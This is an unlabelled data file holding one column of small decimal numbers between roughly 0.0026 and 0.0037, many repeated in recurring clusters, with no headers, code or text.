0.00303894
0.00303657
0.00302575
0.00303896
0.00302314
0.00302573
0.00302319
0.00303894
0.00303657
0.00302575
0.00303896
0.00302314
0.00302573
0.00301733
0.00300132
0.00301723
0.00300143
0.00301733
0.00300132
0.00301723
0.00300143
0.0030173
0.00301494
0.00300157
0.00300415
0.00301729
0.00301492
0.00300164
0.0030173
0.00301494
0.00300157
0.00300415
0.00301729
0.00301492
0.00300164
0.00303898
0.00303898
0.00302364
0.00302299
0.00302299
0.00303882
0.0030228
0.00300123
0.00301717
0.00301695
0.00300142
0.00300142
0.00301732
0.00301732
0.00300123
0.00301717
0.00302319
0.00303894
0.00303657
0.00302575
0.00303896
0.00302314
0.00302573
0.003023
0.00303888
0.00303898
0.00302288
0.00302319
0.00303657
0.00303894
0.00302575
0.00303896
0.00302573
0.00302314
0.00301733
0.00300132
0.00301723
0.00300143
0.00301731
0.00301494
0.00300157
0.00300415
0.00301729
0.00301492
0.00300164
0.00301733
0.00300132
0.00301723
0.00300143
0.00301731
0.00301494
0.00300415
0.00300157
0.00301492
0.00301729
0.00300164
0.003023
0.00303888
0.00303898
0.00302288
0.00302319
0.00303657
0.00303895
0.00302575
0.00303896
0.00302573
0.00302314
0.003023
0.00303888
0.00303898
0.00302288
0.00301731
0.00301494
0.00300157
0.00300415
0.00301729
0.00301492
0.00300164
0.00301733
0.00300132
0.00301723
0.00300143
0.00301731
0.00301494
0.00300415
0.00300157
0.00301492
0.00301729
0.00300164
0.00301733
0.00300132
0.00301723
0.00300143
0.00303898
0.00303898
0.00302364
0.00302299
0.00302299
0.00303882
0.0030228
0.00300123
0.00301717
0.00301695
0.00300142
0.00300142
0.00301732
0.00301732
0.00300124
0.00301717
0.00302319
0.00303657
0.00303895
0.00302575
0.00303896
0.00302573
0.00302314
0.003023
0.00303888
0.00303898
0.00302288
0.003023
0.00303888
0.00303898
0.00302288
0.00301731
0.00301494
0.00300415
0.00300157
0.00301492
0.00301729
0.00300164
0.00301731
0.00301494
0.00300415
0.00300157
0.00301492
0.00301729
0.00300164
0.00301733
0.00300132
0.00301723
0.00300143
0.00301733
0.00300132
0.00301723
0.00300143
0.00303882
0.0030228
0.00303882
0.0030228
0.00301695
0.00300142
0.00300142
0.00301732
0.00301732
0.00300123
0.00301717
0.00300123
0.00301717
0.00299564
0.00297979
0.00299564
0.00297979
0.00299578
0.00299578
0.00298061
0.00297996
0.00297996
0.00295846
0.00297422
0.00295845
0.00297422
0.002974
0.00295862
0.00295862
0.00297436
0.00297436
0.00297999
0.00299569
0.00299579
0.00297987
0.0029802
0.00299575
0.0029934
0.0029827
0.00299578
0.00298012
0.00298269
0.0029802
0.00299575
0.0029934
0.0029827
0.00299578
0.00298012
0.00298269
0.00297438
0.00295853
0.00297428
0.00295865
0.00297438
0.00295853
0.00297428
0.00295865
0.00297436
0.00297201
0.00295879
0.00296134
0.00297433
0.002972
0.00295887
0.00297436
0.00297201
0.00295879
0.00296134
0.00297433
0.002972
0.00295887
0.00299578
0.00299578
0.00298061
0.00297996
0.00297996
0.00299564
0.00297979
0.00295845
0.00297422
0.002974
0.00295862
0.00295862
0.00297436
0.00297436
0.00295845
0.00297422
0.0029802
0.00299575
0.0029934
0.0029827
0.00299578
0.00298012
0.00298269
0.00297999
0.00299569
0.00299579
0.00297987
0.0029802
0.0029934
0.00299575
0.0029827
0.00299578
0.00298269
0.00298012
0.00297438
0.00295853
0.00297428
0.00295865
0.00297436
0.00297201
0.00295879
0.00296134
0.00297433
0.002972
0.00295887
0.00297438
0.00295853
0.00297428
0.00295865
0.00297436
0.00297201
0.00296134
0.00295879
0.002972
0.00297433
0.00295887
0.00297999
0.00299569
0.00299579
0.00297987
0.0029802
0.0029934
0.00299575
0.0029827
0.00299578
0.00298269
0.00298012
0.00297999
0.00299569
0.00299579
0.00297987
0.00297436
0.00297201
0.00295879
0.00296134
0.00297433
0.002972
0.00295887
0.00297438
0.00295853
0.00297427
0.00295865
0.00297436
0.00297201
0.00296134
0.00295879
0.002972
0.00297433
0.00295887
0.00297438
0.00295853
0.00297428
0.00295865
0.00299578
0.00299579
0.00298061
0.00297997
0.00297996
0.00299564
0.00297979
0.00295845
0.00297422
0.002974
0.00295862
0.00295862
0.00297436
0.00297436
0.00295845
0.00297422
0.0029802
0.0029934
0.00299575
0.0029827
0.00299578
0.00298269
0.00298012
0.00297999
0.0029957
0.00299579
0.00297987
0.00297999
0.0029957
0.00299579
0.00297987
0.00297436
0.00297201
0.00296134
0.00295879
0.002972
0.00297433
0.00295887
0.00297436
0.00297201
0.00296134
0.00295879
0.002972
0.00297433
0.00295887
0.00297438
0.00295853
0.00297428
0.00295865
0.00297438
0.00295853
0.00297428
0.00295865
0.00299564
0.00297979
0.00299564
0.00297979
0.002974
0.00295862
0.00295862
0.00297436
0.00297436
0.00295845
0.00297422
0.00295845
0.00297422
0.00295292
0.00293723
0.00295291
0.00293723
0.00295305
0.00295305
0.00293806
0.00293739
0.00293739
0.00291611
0.00293172
0.00291611
0.00293172
0.0029315
0.00291626
0.00291626
0.00293184
0.00293184
0.00293743
0.00295297
0.00295307
0.0029373
0.00293766
0.00295302
0.0029507
0.00294011
0.00295306
0.00293756
0.0029401
0.00293766
0.00295302
0.0029507
0.00294011
0.00295306
0.00293756
0.0029401
0.00293187
0.00291618
0.00293177
0.00291631
0.00293187
0.00291618
0.00293177
0.00291631
0.00293186
0.00292953
0.00291643
0.00291896
0.00293181
0.00292952
0.00291655
0.00293186
0.00292953
0.00291643
0.00291896
0.00293181
0.00292952
0.00291655
0.00295305
0.00295305
0.00293806
0.00293739
0.00293739
0.00295292
0.00293723
0.00291611
0.00293172
0.0029315
0.00291626
0.00291626
0.00293184
0.00293184
0.00291611
0.00293172
0.00293766
0.00295302
0.0029507
0.00294011
0.00295306
0.00293756
0.0029401
0.00293743
0.00295297
0.00295307
0.0029373
0.00293766
0.0029507
0.00295302
0.00294011
0.00295306
0.0029401
0.00293756
0.00293187
0.00291618
0.00293177
0.00291631
0.00293186
0.00292953
0.00291643
0.00291896
0.00293181
0.00292952
0.00291655
0.00293187
0.00291618
0.00293177
0.00291631
0.00293186
0.00292953
0.00291896
0.00291643
0.00292952
0.00293181
0.00291655
0.00293743
0.00295297
0.00295307
0.0029373
0.00293766
0.0029507
0.00295302
0.00294011
0.00295306
0.0029401
0.00293756
0.00293743
0.00295297
0.00295307
0.0029373
0.00293186
0.00292953
0.00291643
0.00291896
0.00293181
0.00292952
0.00291655
0.00293187
0.00291618
0.00293177
0.00291631
0.00293186
0.00292953
0.00291896
0.00291643
0.00292952
0.00293181
0.00291655
0.00293187
0.00291618
0.00293177
0.00291631
0.00295305
0.00295305
0.00293806
0.00293739
0.00293739
0.00295292
0.00293723
0.00291611
0.00293172
0.0029315
0.00291626
0.00291626
0.00293184
0.00293184
0.00291611
0.00293172
0.00293766
0.0029507
0.00295302
0.00294011
0.00295306
0.0029401
0.00293756
0.00293743
0.00295297
0.00295307
0.0029373
0.00293743
0.00295297
0.00295307
0.0029373
0.00293186
0.00292953
0.00291896
0.00291643
0.00292952
0.00293181
0.00291655
0.00293186
0.00292953
0.00291896
0.00291643
0.00292952
0.00293181
0.00291655
0.00293187
0.00291618
0.00293177
0.00291631
0.00293187
0.00291618
0.00293177
0.00291631
0.00295291
0.00293723
0.00295291
0.00293723
0.0029315
0.00291626
0.00291626
0.00293184
0.00293184
0.00291611
0.00293172
0.00291611
0.00293172
0.00291063
0.00289509
0.00291062
0.00289509
0.00291074
0.00291074
0.00289593
0.00289524
0.00289524
0.00287417
0.00288963
0.00287417
0.00288963
0.00288941
0.00287431
0.00287431
0.00288975
0.00288974
0.00289529
0.00291067
0.00291078
0.00289516
0.00289554
0.00291071
0.00290843
0.00289794
0.00291077
0.00289541
0.00289793
0.00289554
0.00291071
0.00290843
0.00289794
0.00291077
0.00289541
0.00289793
0.00288978
0.00287424
0.00288968
0.00287437
0.00288978
0.00287423
0.00288968
0.00287437
0.00288978
0.00288746
0.00287449
0.002877
0.00288972
0.00288745
0.00287462
0.00288978
0.00288746
0.00287448
0.002877
0.00288972
0.00288745
0.00287462
0.00291075
0.00291074
0.00289593
0.00289524
0.00289524
0.00291063
0.00289509
0.00287416
0.00288964
0.00288941
0.0028743
0.00287431
0.00288975
0.00288974
0.00287417
0.00288963
0.00289554
0.00291071
0.00290843
0.00289794
0.00291077
0.00289541
0.00289793
0.00289529
0.00291067
0.00291078
0.00289516
0.00289554
0.00290843
0.00291071
0.00289794
0.00291077
0.00289793
0.00289541
0.00288978
0.00287424
0.00288968
0.00287437
0.00288978
0.00288746
0.00287449
0.002877
0.00288972
0.00288745
0.00287462
0.00288978
0.00287424
0.00288968
0.00287437
0.00288978
0.00288746
0.002877
0.00287449
0.00288745
0.00288972
0.00287462
0.00289529
0.00291067
0.00291078
0.00289516
0.00289554
0.00290843
0.00291071
0.00289794
0.00291077
0.00289793
0.00289541
0.00289529
0.00291067
0.00291078
0.00289516
0.00288978
0.00288746
0.00287448
0.002877
0.00288972
0.00288745
0.00287462
0.00288978
0.00287424
0.00288968
0.00287437
0.00288978
0.00288746
0.002877
0.00287448
0.00288745
0.00288972
0.00287462
0.00288978
0.00287424
0.00288968
0.00287437
0.00291074
0.00291074
0.00289593
0.00289524
0.00289524
0.00291062
0.00289509
0.00287417
0.00288963
0.00288941
0.00287431
0.00287431
0.00288974
0.00288974
0.00287417
0.00288963
0.00289554
0.00290843
0.00291071
0.00289794
0.00291077
0.00289793
0.00289541
0.00289529
0.00291067
0.00291078
0.00289516
0.00289529
0.00291067
0.00291078
0.00289516
0.00288978
0.00288746
0.002877
0.00287448
0.00288745
0.00288972
0.00287462
0.00288978
0.00288746
0.002877
0.00287448
0.00288745
0.00288972
0.00287462
0.00288978
0.00287424
0.00288968
0.00287437
0.00288978
0.00287424
0.00288968
0.00287437
0.00291063
0.00289509
0.00291063
0.00289509
0.00288941
0.00287431
0.00287431
0.00288974
0.00288974
0.00287417
0.00288963
0.00287417
0.00288963
0.00286874
0.00285335
0.00286874
0.00285335
0.00286885
0.00286885
0.0028542
0.00285348
0.00285348
0.00283262
0.00284794
0.00283262
0.00284794
0.00284772
0.00283275
0.00283275
0.00284804
0.00284804
0.00285354
0.00286878
0.00286889
0.00285341
0.00285381
0.00286882
0.00286657
0.00285616
0.00286889
0.00285366
0.00285616
0.00285381
0.00286882
0.00286657
0.00285616
0.00286889
0.00285366
0.00285616
0.00284809
0.00283268
0.00284799
0.00283281
0.00284809
0.00283268
0.00284799
0.00283281
0.00284809
0.00284578
0.00283292
0.00283542
0.00284801
0.00284578
0.00283308
0.00284809
0.00284578
0.00283292
0.00283542
0.00284801
0.00284578
0.00283308
0.00286884
0.00286884
0.00285419
0.00285348
0.00285348
0.00286874
0.00285335
0.00283262
0.00284794
0.00284772
0.00283275
0.00283275
0.00284804
0.00284804
0.00283262
0.00284794
0.00285381
0.00286882
0.00286657
0.00285616
0.00286889
0.00285366
0.00285616
0.00285354
0.00286878
0.00286889
0.00285341
0.00285381
0.00286657
0.00286882
0.00285616
0.00286889
0.00285616
0.00285366
0.00284809
0.00283268
0.00284798
0.00283281
0.00284809
0.00284578
0.00283292
0.00283542
0.00284801
0.00284578
0.00283308
0.00284809
0.00283268
0.00284799
0.00283281
0.00284809
0.00284578
0.00283542
0.00283292
0.00284578
0.00284801
0.00283308
0.00285354
0.00286878
0.00286889
0.00285341
0.00285381
0.00286657
0.00286882
0.00285616
0.00286889
0.00285616
0.00285366
0.00285354
0.00286878
0.00286889
0.00285341
0.00284809
0.00284578
0.00283292
0.00283542
0.00284801
0.00284578
0.00283308
0.00284809
0.00283268
0.00284799
0.00283281
0.00284809
0.00284578
0.00283542
0.00283292
0.00284578
0.00284801
0.00283308
0.00284809
0.00283268
0.00284798
0.00283281
0.00286885
0.00286885
0.00285419
0.00285348
0.00285348
0.00286874
0.00285335
0.00283262
0.00284794
0.00284772
0.00283275
0.00283275
0.00284804
0.00284804
0.00283262
0.00284794
0.00285381
0.00286657
0.00286882
0.00285616
0.00286889
0.00285616
0.00285366
0.00285354
0.00286878
0.00286889
0.00285341
0.00285354
0.00286878
0.00286889
0.00285341
0.00284809
0.00284578
0.00283542
0.00283292
0.00284578
0.00284801
0.00283308
0.00284809
0.00284578
0.00283542
0.00283292
0.00284578
0.00284801
0.00283308
0.00284809
0.00283268
0.00284799
0.00283281
0.00284809
0.00283268
0.00284799
0.00283281
0.00286874
0.00285335
0.00286874
0.00285335
0.00284772
0.00283275
0.00283275
0.00284804
0.00284804
0.00283262
0.00284794
0.00283262
0.00284794
0.00282724
0.00281199
0.00282724
0.00281198
0.00282733
0.00282733
0.00281283
0.0028121
0.0028121
0.00279144
0.00280663
0.00279144
0.00280663
0.00280639
0.00279155
0.00279155
0.00280671
0.00280671
0.00281217
0.00282728
0.00282738
0.00281204
0.00281245
0.0028273
0.00282508
0.00281476
0.00282738
0.00281228
0.00281476
0.00281245
0.0028273
0.00282508
0.00281476
0.00282738
0.00281228
0.00281476
0.00280677
0.00279149
0.00280666
0.00279162
0.00280677
0.00279149
0.00280666
0.00279162
0.00280677
0.00280447
0.00279172
0.0027942
0.00280669
0.00280447
0.0027919
0.00280677
0.00280447
0.00279172
0.0027942
0.00280668
0.00280447
0.0027919
0.00282733
0.00282733
0.00281283
0.0028121
0.0028121
0.00282724
0.00281198
0.00279143
0.00280663
0.00280639
0.00279155
0.00279155
0.00280671
0.00280671
0.00279143
0.00280663
0.00281245
0.0028273
0.00282508
0.00281476
0.00282738
0.00281228
0.00281476
0.00281217
0.00282728
0.00282738
0.00281204
0.00281245
0.00282508
0.0028273
0.00281476
0.00282738
0.00281476
0.00281228
0.00280677
0.00279149
0.00280666
0.00279162
0.00280677
0.00280447
0.00279172
0.0027942
0.00280668
0.00280447
0.0027919
0.00280677
0.00279149
0.00280666
0.00279162
0.00280677
0.00280447
0.0027942
0.00279172
0.00280447
0.00280668
0.0027919
0.00281217
0.00282728
0.00282738
0.00281204
0.00281245
0.00282508
0.0028273
0.00281476
0.00282738
0.00281476
0.00281228
0.00281217
0.00282728
0.00282738
0.00281204
0.00280677
0.00280447
0.00279172
0.0027942
0.00280668
0.00280447
0.0027919
0.00280677
0.00279149
0.00280666
0.00279162
0.00280677
0.00280447
0.0027942
0.00279172
0.00280447
0.00280668
0.0027919
0.00280676
0.00279149
0.00280666
0.00279162
0.00282733
0.00282733
0.00281283
0.0028121
0.0028121
0.00282724
0.00281198
0.00279144
0.00280663
0.00280639
0.00279155
0.00279155
0.00280671
0.00280671
0.00279144
0.00280663
0.00281245
0.00282508
0.0028273
0.00281476
0.00282738
0.00281476
0.00281228
0.00281217
0.00282728
0.00282738
0.00281204
0.00281217
0.00282728
0.00282738
0.00281204
0.00280677
0.00280447
0.0027942
0.00279172
0.00280447
0.00280668
0.0027919
0.00280677
0.00280447
0.0027942
0.00279172
0.00280447
0.00280668
0.0027919
0.00280677
0.00279149
0.00280666
0.00279162
0.00280677
0.00279149
0.00280666
0.00279162
0.00282724
0.00281198
0.00282724
0.00281198
0.00280639
0.00279154
0.00279154
0.00280671
0.00280671
0.00279143
0.00280663
0.00279143
0.00280663
0.0027861
0.00277097
0.0027861
0.00277097
0.00278618
0.00278618
0.00277181
0.00277108
0.00277108
0.00275059
0.00276566
0.00275059
0.00276566
0.00276541
0.00275069
0.00275069
0.00276574
0.00276573
0.00277115
0.00278614
0.00278624
0.00277102
0.00277144
0.00278616
0.00278394
0.00277371
0.00278624
0.00277125
0.00277371
0.00277144
0.00278615
0.00278394
0.00277371
0.00278624
0.00277125
0.00277371
0.00276579
0.00275064
0.00276569
0.00275076
0.00276579
0.00275064
0.00276569
0.00275076
0.00276579
0.0027635
0.00275087
0.00275331
0.00276571
0.0027635
0.00275105
0.00276579
0.0027635
0.00275086
0.00275331
0.00276571
0.0027635
0.00275105
0.00278618
0.00278618
0.00277181
0.00277108
0.00277108
0.0027861
0.00277097
0.00275059
0.00276566
0.00276541
0.00275069
0.00275069
0.00276573
0.00276573
0.00275059
0.00276566
0.00277144
0.00278615
0.00278394
0.00277371
0.00278624
0.00277125
0.00277371
0.00277115
0.00278614
0.00278624
0.00277102
0.00277144
0.00278394
0.00278615
0.00277371
0.00278624
0.00277371
0.00277125
0.00276579
0.00275064
0.00276569
0.00275076
0.00276579
0.0027635
0.00275086
0.00275331
0.00276571
0.0027635
0.00275105
0.00276579
0.00275064
0.00276569
0.00275076
0.00276579
0.0027635
0.00275331
0.00275086
0.0027635
0.00276571
0.00275105
0.00277115
0.00278613
0.00278624
0.00277102
0.00277144
0.00278394
0.00278615
0.00277371
0.00278624
0.00277371
0.00277125
0.00277115
0.00278613
0.00278624
0.00277102
0.00276579
0.0027635
0.00275086
0.00275331
0.00276571
0.0027635
0.00275105
0.00276579
0.00275064
0.00276569
0.00275076
0.00276579
0.0027635
0.00275331
0.00275086
0.0027635
0.00276571
0.00275105
0.00276579
0.00275063
0.00276569
0.00275076
0.00278618
0.00278618
0.00277181
0.00277108
0.00277108
0.0027861
0.00277097
0.00275059
0.00276566
0.00276541
0.00275069
0.00275069
0.00276573
0.00276573
0.00275059
0.00276566
0.00277144
0.00278394
0.00278615
0.00277371
0.00278624
0.00277371
0.00277125
0.00277115
0.00278614
0.00278624
0.00277102
0.00277115
0.00278613
0.00278624
0.00277102
0.00276579
0.0027635
0.00275331
0.00275086
0.0027635
0.00276571
0.00275105
0.00276579
0.0027635
0.00275331
0.00275086
0.0027635
0.00276571
0.00275105
0.00276579
0.00275064
0.00276569
0.00275076
0.00276579
0.00275063
0.00276569
0.00275076
0.0027861
0.00277097
0.0027861
0.00277097
0.00276541
0.00275068
0.00275068
0.00276573
0.00276573
0.00275059
0.00276566
0.00275059
0.00276566
0.00274531
0.00273027
0.0027453
0.00273028
0.00274537
0.00274537
0.00273112
0.00273037
0.00273037
0.00271005
0.002725
0.00271005
0.00272501
0.00272475
0.00271014
0.00271014
0.00272507
0.00272508
0.00273045
0.00274533
0.00274542
0.00273033
0.00273074
0.00274534
0.00274314
0.00273299
0.00274542
0.00273055
0.00273299
0.00273074
0.00274534
0.00274314
0.00273299
0.00274542
0.00273055
0.00273299
0.00272513
0.00271009
0.00272504
0.00271021
0.00272513
0.00271009
0.00272504
0.00271021
0.00272513
0.00272285
0.00271031
0.00271274
0.00272505
0.00272286
0.00271051
0.00272513
0.00272285
0.00271031
0.00271274
0.00272505
0.00272286
0.00271051
0.00274536
0.00274537
0.00273112
0.00273038
0.00273037
0.0027453
0.00273028
0.00271004
0.00272502
0.00272475
0.00271013
0.00271014
0.00272508
0.00272507
0.00271005
0.00272501
0.00273074
0.00274534
0.00274314
0.00273299
0.00274542
0.00273055
0.00273299
0.00273045
0.00274533
0.00274542
0.00273033
0.00273074
0.00274314
0.00274534
0.00273299
0.00274542
0.00273299
0.00273055
0.00272513
0.00271009
0.00272504
0.00271021
0.00272513
0.00272286
0.00271031
0.00271274
0.00272505
0.00272286
0.00271051
0.00272513
0.00271009
0.00272504
0.00271021
0.00272513
0.00272286
0.00271274
0.00271031
0.00272286
0.00272505
0.00271051
0.00273045
0.00274533
0.00274542
0.00273033
0.00273074
0.00274314
0.00274534
0.00273299
0.00274542
0.00273299
0.00273055
0.00273045
0.00274533
0.00274542
0.00273033
0.00272513
0.00272286
0.00271031
0.00271274
0.00272505
0.00272286
0.00271051
0.00272513
0.00271009
0.00272504
0.00271021
0.00272513
0.00272286
0.00271274
0.00271031
0.00272286
0.00272505
0.00271051
0.00272513
0.00271009
0.00272504
0.00271021
0.00274537
0.00274537
0.00273112
0.00273037
0.00273037
0.0027453
0.00273028
0.00271005
0.00272501
0.00272475
0.00271014
0.00271014
0.00272508
0.00272508
0.00271005
0.00272501
0.00273074
0.00274314
0.00274534
0.00273299
0.00274542
0.00273299
0.00273055
0.00273045
0.00274533
0.00274542
0.00273033
0.00273045
0.00274533
0.00274542
0.00273033
0.00272513
0.00272286
0.00271274
0.00271031
0.00272286
0.00272505
0.00271051
0.00272513
0.00272286
0.00271274
0.00271031
0.00272286
0.00272505
0.00271051
0.00272513
0.00271009
0.00272504
0.00271021
0.00272513
0.00271009
0.00272504
0.00271021
0.0027453
0.00273028
0.0027453
0.00273028
0.00272475
0.00271014
0.00271014
0.00272508
0.00272508
0.00271005
0.00272501
0.00271005
0.00272501
0.0027048
0.00268989
0.0027048
0.00268989
0.00270486
0.00270486
0.00269073
0.00268997
0.00268997
0.0026698
0.00268466
0.0026698
0.00268466
0.00268439
0.00266988
0.00266988
0.00268472
0.00268472
0.00269005
0.00270483
0.00270492
0.00268994
0.00269035
0.00270483
0.00270265
0.00269257
0.00270491
0.00269015
0.00269257
0.00269035
0.00270483
0.00270265
0.00269257
0.00270491
0.00269015
0.00269257
0.00268477
0.00266984
0.00268469
0.00266996
0.00268478
0.00266983
0.00268469
0.00266995
0.00268477
0.00268251
0.00267005
0.00267247
0.00268469
0.00268251
0.00267025
0.00268477
0.00268251
0.00267004
0.00267247
0.00268469
0.00268251
0.00267025
0.00270486
0.00270486
0.00269073
0.00268999
0.00268998
0.0027048
0.00268989
0.00266979
0.00268467
0.00268439
0.00266988
0.00266988
0.00268473
0.00268472
0.0026698
0.00268466
0.00269035
0.00270483
0.00270265
0.00269257
0.00270491
0.00269014
0.00269257
0.00269005
0.00270483
0.00270492
0.00268993
0.00269035
0.00270265
0.00270483
0.00269257
0.00270491
0.00269257
0.00269014
0.00268477
0.00266984
0.00268469
0.00266996
0.00268477
0.00268251
0.00267005
0.00267247
0.00268469
0.00268251
0.00267025
0.00268477
0.00266984
0.00268469
0.00266996
0.00268477
0.00268251
0.00267247
0.00267005
0.00268251
0.00268469
0.00267025
0.00269005
0.00270483
0.00270492
0.00268993
0.00269035
0.00270265
0.00270483
0.00269257
0.00270491
0.00269257
0.00269014
0.00269005
0.00270483
0.00270492
0.00268993
0.00268477
0.00268251
0.00267005
0.00267247
0.00268469
0.00268251
0.00267025
0.00268477
0.00266984
0.00268469
0.00266996
0.00268477
0.00268251
0.00267247
0.00267005
0.00268251
0.00268469
0.00267025
0.00268477
0.00266984
0.00268469
0.00266996
0.00270486
0.00270486
0.00269073
0.00268998
0.00268998
0.0027048
0.00268989
0.0026698
0.00268466
0.00268439
0.00266988
0.00266988
0.00268472
0.00268472
0.0026698
0.00268466
0.00269035
0.00270265
0.00270483
0.00269257
0.00270491
0.00269257
0.00269014
0.00269005
0.00270483
0.00270492
0.00268993
0.00269005
0.00270483
0.00270492
0.00268993
0.00268477
0.00268251
0.00267247
0.00267005
0.00268251
0.00268469
0.00267025
0.00268477
0.00268251
0.00267247
0.00267005
0.00268251
0.00268469
0.00267025
0.00268478
0.00266984
0.00268469
0.00266996
0.00268478
0.00266984
0.00268469
0.00266996
0.0027048
0.00268989
0.0027048
0.00268989
0.00268439
0.00266988
0.00266988
0.00268472
0.00268472
0.0026698
0.00268466
0.0026698
0.00268466
0.0026646
0.00264977
0.00266459
0.00264978
0.00266465
0.00266465
0.00265061
0.00264985
0.00264986
0.00264993
0.00266461
0.0026647
0.00264982
0.00265023
0.00266461
0.00266244
0.00265243
0.00266469
0.00265002
0.00265243
0.00265023
0.00266461
0.00266244
0.00265243
0.00266469
0.00265002
0.00265243
0.00266465
0.00266465
0.00265061
0.00264986
0.00264986
0.00266459
0.00264978
0.00266462
0.00266244
0.00265243
0.00266469
0.00265002
0.00266462
0.0026647
0.00266244
0.00266461
0.00266469
0.00264993
0.00266462
0.0026647
0.00264982
0.00265022
0.00266244
0.00266461
0.00265243
0.00266469
0.00265243
0.00265002
0.00264993
0.00266462
0.0026647
0.00264982
0.00266465
0.00266465
0.00266459
0.00265023
0.00266244
0.00266461
0.00265243
0.00266469
0.00265243
0.00265002
0.00264993
0.00266462
0.0026647
0.00264993
0.00266462
0.0026647
0.00264982
0.00266459
0.00264978
0.00266459
0.00264978
0.00362586
0.0036406
0.00364173
0.00362589
0.00364054
0.0036418
0.00364186
0.00364174
0.00362586
0.00364052
0.0036419
0.00362587
0.00364056
0.00362582
0.00364063
0.0036258
0.00364048
0.00364181
0.00362587
0.00364058
0.00362588
0.00364064
0.00364181
0.00364191
0.00359147
0.00359147
0.00359223
0.00359789
0.00359789
0.00359532
0.00359294
0.00359616
0.00359373
0.00359294
0.00359615
0.00359373
0.00362204
0.0036093
0.0036107
0.00361029
0.00360153
0.00360651
0.00362421
0.00361741
0.00361335
0.00360318
0.00359954
0.00360427
0.00360932
0.00362205
0.00361071
0.00360153
0.00361028
0.00360651
0.0036032
0.00359955
0.00360429
0.00362422
0.0036174
0.00361335
0.00365065
0.00365025
0.00363814
0.00361561
0.00361563
0.0036267
0.00365095
0.00362037
0.0036323
0.00365049
0.00362042
0.00363231
0.00355276
0.00355432
0.00354684
0.00354976
0.00354939
0.00355428
0.00354869
0.00353001
0.003557
0.00354533
0.003513
0.00354866
0.00354817
0.00355887
0.00355674
0.00356299
0.00354835
0.00354959
0.00355579
0.00354984
0.00354941
0.00355061
0.00355245
0.00354725
0.00353565
0.00354897
0.00355277
0.00355432
0.00354976
0.00354686
0.00355428
0.00354937
0.00354872
0.00352994
0.00355694
0.00354532
0.00351288
0.00354863
0.00354818
0.00355886
0.00356299
0.00355672
0.00354843
0.00355578
0.00354954
0.00354984
0.00354942
0.0035506
0.00355245
0.00354726
0.00353575
0.00354893
0.00355351
0.00354726
0.00354728
0.00355044
0.00355044
0.00354953
0.00355434
0.00356964
0.00355179
0.00355243
0.00356522
0.00355623
0.00354766
0.00355432
0.00356963
0.00355182
0.00355237
0.00356522
0.00355621
0.00354763
0.00355062
0.00353071
0.00353078
0.00355515
0.00353957
0.00353949
0.00355222
0.00354799
0.00355318
0.00354776
0.00355147
0.00355112
0.00354848
0.00355221
0.00354799
0.00355316
0.00354775
0.00355146
0.00355111
0.00354847
0.00350535
0.0035062
0.00349909
0.00349984
0.0035052
0.00350602
0.00349921
0.00351156
0.00351854
0.00351185
0.00351751
0.00351242
0.00351193
0.0035128
0.00351772
0.00351873
0.00351799
0.00351172
0.00351262
0.00350504
0.00349961
0.00350526
0.0035058
0.00349897
0.00351129
0.00350474
0.00350535
0.00350621
0.00349984
0.0034991
0.00350602
0.0035052
0.00349921
0.00351156
0.00351854
0.00351184
0.00351751
0.00351243
0.00351193
0.00351281
0.00351873
0.00351772
0.00351799
0.00351262
0.00351172
0.00350504
0.00349961
0.00350526
0.0035058
0.00349898
0.00351127
0.00350474
0.00350576
0.00349868
0.00349868
0.00350479
0.00350479
0.00349954
0.00351198
0.00351756
0.00351787
0.00351254
0.00351804
0.00351159
0.00351182
0.00351199
0.00351756
0.00351787
0.00351254
0.00351805
0.0035116
0.00351182
0.0035124
0.00351736
0.00351737
0.00351855
0.00351135
0.00351135
0.00350537
0.00349906
0.00350591
0.00349893
0.00350499
0.0035052
0.00349923
0.00350537
0.00349906
0.00350591
0.00349893
0.00350499
0.0035052
0.00349923
0.0034534
0.00345407
0.00344716
0.00344758
0.00345344
0.00345389
0.00344711
0.00346013
0.00346671
0.00346007
0.00346638
0.00346038
0.0034602
0.00346088
0.0034665
0.00346702
0.00346649
0.00346022
0.00346071
0.00345334
0.00344725
0.00345326
0.00345357
0.00344705
0.0034598
0.00345301
0.0034534
0.00345407
0.00344758
0.00344716
0.00345389
0.00345344
0.00344711
0.00346013
0.00346671
0.00346007
0.00346637
0.00346038
0.0034602
0.00346089
0.00346702
0.00346651
0.00346649
0.00346071
0.00346022
0.00345334
0.00344725
0.00345326
0.00345357
0.00344705
0.0034598
0.00345302
0.00345344
0.0034467
0.0034467
0.00345298
0.00345298
0.0034471
0.00346019
0.00346625
0.00346623
0.00346049
0.00346645
0.00346005
0.00345996
0.00346019
0.00346625
0.00346623
0.00346049
0.00346645
0.00346005
0.00345996
0.00346024
0.00346603
0.00346604
0.00346658
0.00345976
0.00345976
0.00345336
0.00344686
0.00345367
0.003447
0.0034532
0.00345313
0.00344711
0.00345336
0.00344687
0.00345367
0.003447
0.0034532
0.00345313
0.0034471
0.00340132
0.00340184
0.00339521
0.0033955
0.0034014
0.00340169
0.00339513
0.00340799
0.00341435
0.00340793
0.00341421
0.00340812
0.00340803
0.00340858
0.00341433
0.00341466
0.00341425
0.00340811
0.00340842
0.00340127
0.00339521
0.0034012
0.00340141
0.00339508
0.00340776
0.00340106
0.00340131
0.00340184
0.0033955
0.00339521
0.00340169
0.00340139
0.00339513
0.00340798
0.00341435
0.00340793
0.00341421
0.00340811
0.00340803
0.00340858
0.00341466
0.00341433
0.00341425
0.00340842
0.00340811
0.00340126
0.0033952
0.0034012
0.0034014
0.00339508
0.00340775
0.00340106
0.00340129
0.00339483
0.00339483
0.00340101
0.00340101
0.00339508
0.00340807
0.00341416
0.003414
0.00340821
0.00341425
0.00340802
0.00340782
0.00340807
0.00341416
0.003414
0.00340821
0.00341425
0.00340802
0.00340782
0.00340798
0.00341392
0.00341392
0.00341423
0.0034077
0.0034077
0.00340132
0.00339493
0.00340148
0.00339515
0.00340125
0.00340107
0.00339518
0.00340132
0.00339493
0.00340148
0.00339515
0.00340125
0.00340107
0.00339518
0.00335038
0.00335078
0.00334444
0.00334465
0.00335045
0.00335066
0.00334437
0.00335685
0.00336308
0.00335687
0.00336292
0.00335701
0.00335692
0.00335735
0.00336306
0.00336328
0.00336298
0.003357
0.00335722
0.00335032
0.00334447
0.00335032
0.00335048
0.00334429
0.00335674
0.00335022
0.00335038
0.00335078
0.00334465
0.00334444
0.00335066
0.00335045
0.00334437
0.00335685
0.00336308
0.00335687
0.00336292
0.00335701
0.00335692
0.00335734
0.00336328
0.00336305
0.00336298
0.00335722
0.003357
0.00335031
0.00334447
0.00335032
0.00335048
0.00334429
0.00335674
0.00335021
0.00335042
0.00334416
0.00334416
